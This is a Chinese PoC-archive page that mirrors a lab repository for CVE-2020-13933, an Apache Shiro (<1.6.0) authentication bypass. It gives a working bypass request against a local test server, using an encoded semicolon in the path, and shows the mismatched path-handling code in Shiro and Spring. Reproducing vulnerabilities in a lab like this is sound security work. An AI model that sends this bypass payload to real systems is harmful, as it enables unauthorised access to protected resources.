支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: f902623a8371685eaa094041348558558892b569

来源
https://github.com/EXP-Docs/CVE-2020-13933
关联漏洞
标题:Apache Shiro 授权问题漏洞 (CVE-2020-13933)
Description:Apache Shiro是美国阿帕奇(Apache)软件基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。 Apache Shiro 1.6.0之前版本中存在安全漏洞。攻击者可借助特制的HTTP请求利用该漏洞绕过身份验证。
Description
CVE-2020-13933 靶场: shiro 认证绕过漏洞
介绍
# CVE-2020-13933 靶场

> shiro < 1.6.0 身份认证绕过漏洞

------

## PoC

[http://127.0.0.1:8080/res/%3bpoc](http://127.0.0.1:8080/res/%3bpoc)


## 靶场环境

![](https://img.shields.io/badge/JDK-1.8-brightgreen.svg) ![](https://img.shields.io/badge/Spring-2.3.3-brightgreen.svg) ![](https://img.shields.io/badge/Shiro-1.5.3-brightgreen.svg)


## 代码说明

- [`ShiroConfig.java`](/src/main/java/com/exp/cve/ShiroConfig.java): 
<br/>  权限配置, 当请求 `/res/*` 资源时, 302 跳转到登陆页面进行身份认证
- [`NameController.java`](/src/main/java/com/exp/cve/NameController.java): 
<br/>  · `/res/{name}`: 请求名为 `name` 的的资源(触发身份认证)
<br/>  · `/res/`: 不请求任何资源(不触发身份认证)


## 靶场验证

不在请求路由中指定资源名称时,不触发身份验证,也无资源返回: [`http://127.0.0.1:8080/res/`](http://127.0.0.1:8080/res/)

![](/imgs/01.png)

在请求路由中指定资源名称时,302 跳转到身份验证页面: [`http://127.0.0.1:8080/res/poc`](http://127.0.0.1:8080/res/poc)

![](/imgs/02.png)

构造特定 PoC 请求指定资源时,不触发身份验证,并返回资源: [http://127.0.0.1:8080/res/%3bpoc](http://127.0.0.1:8080/res/%3bpoc) (`%3b` 是 `;` 的 URL 编码)

![](/imgs/03.png)


## 漏洞 DEBUG 位置

### shiro-web-1.5.3.jar

```java
// org.apache.shiro.web.util.WebUtils.java
// line 111

public static String getPathWithinApplication(HttpServletRequest request) {
    return normalize(removeSemicolon(getServletPath(request) + getPathInfo(request)));
}
```

### spring-web-5.2.5.RELEASE.jar

```java
// org.springframework.web.util.UrlPathHelper.java
// line 459

private String decodeAndCleanUriString(HttpServletRequest request, String uri) {
    uri = removeSemicolonContent(uri);
    uri = decodeRequestString(request, uri);
    uri = getSanitizedPath(uri);
    return uri;
}
```
文件快照

 [4.0K]  /data/pocs/f902623a8371685eaa094041348558558892b569
├── [4.0K]  imgs
│   ├── [216K]  01.png
│   ├── [239K]  02.png
│   └── [208K]  03.png
├── [4.0K]  pom.xml
├── [1.9K]  README.md
└── [4.0K]  src
    ├── [4.0K]  main
    │   ├── [4.0K]  java
    │   │   ├── [4.0K]  com
    │   │   │   └── [4.0K]  exp
    │   │   │       └── [4.0K]  cve
    │   │   │           ├── [ 277]  Main.java
    │   │   │           ├── [ 575]  MyRealm.java
    │   │   │           ├── [ 753]  NameController.java
    │   │   │           └── [1.3K]  ShiroConfig.java
    │   │   └── [4.0K]  org
    │   │       ├── [4.0K]  apache
    │   │       │   └── [4.0K]  shiro
    │   │       │       └── [4.0K]  web
    │   │       │           └── [4.0K]  util
    │   │       │               └── [ 30K]  WebUtils.java
    │   │       └── [4.0K]  springframework
    │   │           └── [4.0K]  web
    │   │               └── [4.0K]  util
    │   │                   └── [ 22K]  UrlPathHelper.java
    │   └── [4.0K]  resources
    │       └── [   0]  application.properties
    └── [4.0K]  test
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  exp
        │           └── [4.0K]  cve
        │               └── [ 189]  TestMain.java
        └── [4.0K]  resources
            └── [  60]  测试资源目录.txt

22 directories, 14 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。